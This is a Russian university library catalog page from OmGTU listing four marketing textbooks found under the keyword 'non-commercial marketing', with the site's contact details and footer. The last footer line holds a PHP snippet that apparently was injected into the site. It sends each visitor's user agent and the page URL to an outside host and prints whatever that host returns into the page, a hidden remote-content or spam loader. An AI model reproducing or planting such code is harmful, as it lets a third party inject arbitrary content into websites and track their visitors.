Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

46 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Некоммерческий маркетинг")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Титова, Наталья Евгеньевна. Маркетинг [Текст] : Учеб. пособие для вузов / Н. Е. Титова, Ю. П. Кожаев, 2003. - 349 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии рассматриваются возможность и целесообразность применения маркетинга в условиях отечественной экономики. Особое внимание уделяется проблемам анализа <конкурентов>, <стратегического> <планирования>, управления <рисками>, маркетингу <торгово-посреднических услуг> и другим аспектам маркетинговой деятельности.

2. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 2000. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Маркетинговая деятельность -- Маркетинговая среда -- Покупатель -- Потребитель -- Покупка -- Рынок -- Маркетинговое исследование -- Сегментация рынка -- Товар -- Товарная марка -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование -- Пропаганда -- Стратегическое управление -- Международный маркетинг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
3. 
Басовский, Леонид Ефимович. Маркетинг [Текст] : Курс лекций / Л. Е. Басовский, 1999. - 218 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Курс лекций -- Маркетинговая деятельность -- Покупатель -- Покупка -- Маркетинговое исследование -- Сегментация рынка -- Товарная марка -- Товар -- Упаковка -- Услуга -- Ценообразование -- Товародвижение -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Реклама -- Стимулирование сбыта -- Стратегическое управление -- Стратегическое планирование -- Маркетинг услуг -- Некоммерческий маркетинг
Держатели документа (Информация об экземплярах) 
4. 
Концепция маркетинга для публичных библиотек [Текст] / П. Борхард, Ш. Флодель, М. Мильц; Е. М. Ястребова, 1993. - 143 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2992 - 19.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.79 с.12 запросов, 0.52c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;